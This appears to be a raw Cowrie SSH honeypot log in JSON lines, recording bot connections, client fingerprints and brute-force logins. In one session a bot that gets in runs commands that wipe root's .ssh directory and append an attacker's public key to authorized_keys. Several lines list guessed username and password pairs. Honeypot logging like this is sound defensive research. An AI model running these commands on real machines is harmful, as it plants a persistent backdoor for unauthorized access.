{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T04:09:39.865793Z","src_ip":"212.227.235.229","session":"7ecdea19b6ed"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:09:41.279582Z","src_ip":"212.227.235.229","session":"2741e71c6fb1"}
{"eventid":"cowrie.login.failed","username":"belkinstyle","password":"72ca06","message":"login attempt [belkinstyle/72ca06] failed","sensor":"my-vps","timestamp":"2025-08-26T04:09:41.400328Z","src_ip":"212.227.235.229","session":"7ecdea19b6ed"}
{"eventid":"cowrie.session.connect","src_ip":"68.183.87.241","src_port":42360,"dst_ip":"1.2.3.4","dst_port":22,"session":"4790614bdbd6","protocol":"ssh","message":"New connection: 68.183.87.241:42360 (1.2.3.4:22) [session: 4790614bdbd6]","sensor":"my-vps","timestamp":"2025-08-26T04:09:41.709565Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:09:41.710530Z","src_ip":"68.183.87.241","session":"4790614bdbd6"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:09:41.972065Z","src_ip":"68.183.87.241","session":"4790614bdbd6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45550,"dst_ip":"1.2.3.4","dst_port":22,"session":"897a4542e660","protocol":"ssh","message":"New connection: 212.227.235.229:45550 (1.2.3.4:22) [session: 897a4542e660]","sensor":"my-vps","timestamp":"2025-08-26T04:09:42.757038Z"}
{"eventid":"cowrie.login.success","username":"root","password":"qwert123456","message":"login attempt [root/qwert123456] succeeded","sensor":"my-vps","timestamp":"2025-08-26T04:09:43.060384Z","src_ip":"68.183.87.241","session":"4790614bdbd6"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T04:09:43.268642Z","src_ip":"212.227.235.229","session":"897a4542e660"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T04:09:43.319432Z","src_ip":"212.227.235.229","session":"897a4542e660"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T04:09:43.635783Z","src_ip":"68.183.87.241","session":"4790614bdbd6"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T04:09:43.636454Z","src_ip":"68.183.87.241","session":"4790614bdbd6"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T04:09:43.637501Z","src_ip":"68.183.87.241","session":"4790614bdbd6"}
{"eventid":"cowrie.session.closed","duration":"4.0","message":"Connection lost after 4.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:09:43.639405Z","src_ip":"212.227.235.229","session":"7ecdea19b6ed"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:09:43.900734Z","src_ip":"68.183.87.241","session":"4790614bdbd6"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T04:09:44.441665Z","src_ip":"68.183.87.241","session":"4790614bdbd6"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T04:09:44.442369Z","src_ip":"68.183.87.241","session":"4790614bdbd6"}
{"eventid":"cowrie.login.failed","username":"bin","password":"bin","message":"login attempt [bin/bin] failed","sensor":"my-vps","timestamp":"2025-08-26T04:09:44.681837Z","src_ip":"212.227.235.229","session":"897a4542e660"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T04:09:44.706192Z","src_ip":"68.183.87.241","session":"4790614bdbd6"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:09:44.707034Z","src_ip":"68.183.87.241","session":"4790614bdbd6"}
{"eventid":"cowrie.session.connect","src_ip":"68.183.87.241","src_port":59866,"dst_ip":"1.2.3.4","dst_port":22,"session":"8086d36bf7f4","protocol":"ssh","message":"New connection: 68.183.87.241:59866 (1.2.3.4:22) [session: 8086d36bf7f4]","sensor":"my-vps","timestamp":"2025-08-26T04:09:44.976275Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:09:44.977046Z","src_ip":"68.183.87.241","session":"8086d36bf7f4"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:09:45.249115Z","src_ip":"68.183.87.241","session":"8086d36bf7f4"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T04:09:46.375167Z","src_ip":"68.183.87.241","session":"8086d36bf7f4"}
{"eventid":"cowrie.session.closed","duration":"3.8","message":"Connection lost after 3.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:09:46.590307Z","src_ip":"212.227.235.229","session":"897a4542e660"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:09:47.649198Z","src_ip":"68.183.87.241","session":"8086d36bf7f4"}
{"eventid":"cowrie.session.connect","src_ip":"68.183.87.241","src_port":59882,"dst_ip":"1.2.3.4","dst_port":22,"session":"fcf8fd4ef61f","protocol":"ssh","message":"New connection: 68.183.87.241:59882 (1.2.3.4:22) [session: fcf8fd4ef61f]","sensor":"my-vps","timestamp":"2025-08-26T04:09:47.909300Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:09:47.910202Z","src_ip":"68.183.87.241","session":"fcf8fd4ef61f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:09:48.165034Z","src_ip":"68.183.87.241","session":"fcf8fd4ef61f"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T04:09:49.236455Z","src_ip":"68.183.87.241","session":"fcf8fd4ef61f"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:09:49.498595Z","src_ip":"68.183.87.241","session":"fcf8fd4ef61f"}
{"eventid":"cowrie.session.closed","duration":"7.8","message":"Connection lost after 7.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:09:49.499486Z","src_ip":"68.183.87.241","session":"4790614bdbd6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46274,"dst_ip":"1.2.3.4","dst_port":22,"session":"8a9c583bd81f","protocol":"ssh","message":"New connection: 212.227.235.229:46274 (1.2.3.4:22) [session: 8a9c583bd81f]","sensor":"my-vps","timestamp":"2025-08-26T04:09:51.042214Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T04:09:51.085777Z","src_ip":"212.227.235.229","session":"8a9c583bd81f"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T04:09:51.402938Z","src_ip":"212.227.235.229","session":"8a9c583bd81f"}
{"eventid":"cowrie.login.failed","username":"xbmc","password":"xbmc","message":"login attempt [xbmc/xbmc] failed","sensor":"my-vps","timestamp":"2025-08-26T04:09:52.484421Z","src_ip":"212.227.235.229","session":"8a9c583bd81f"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:09:53.912183Z","src_ip":"212.227.235.229","session":"8a9c583bd81f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59998,"dst_ip":"1.2.3.4","dst_port":22,"session":"5cd3aa556b53","protocol":"ssh","message":"New connection: 212.227.235.229:59998 (1.2.3.4:22) [session: 5cd3aa556b53]","sensor":"my-vps","timestamp":"2025-08-26T04:09:54.804033Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T04:09:54.823063Z","src_ip":"212.227.235.229","session":"5cd3aa556b53"}
